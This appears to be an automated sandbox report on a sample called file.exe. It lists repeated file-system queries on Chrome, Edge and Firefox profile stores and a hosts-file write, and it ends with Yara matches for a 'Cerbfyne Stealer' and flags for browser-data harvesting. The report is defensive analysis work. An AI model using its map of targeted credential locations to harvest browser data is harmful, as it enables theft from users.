              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\jones\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Modifies the hosts file
              Source: C:\Users\user\Desktop\file.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Cerbfyne Stealer
              Source: Yara matchFile source: file.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.file.exe.7ff608fb0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.7ff608fb0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1521365374.00007FF60A08C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.1232496497.00007FF60A08C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 1408, type: MEMORYSTR
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\jones\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pingsJump to behavior
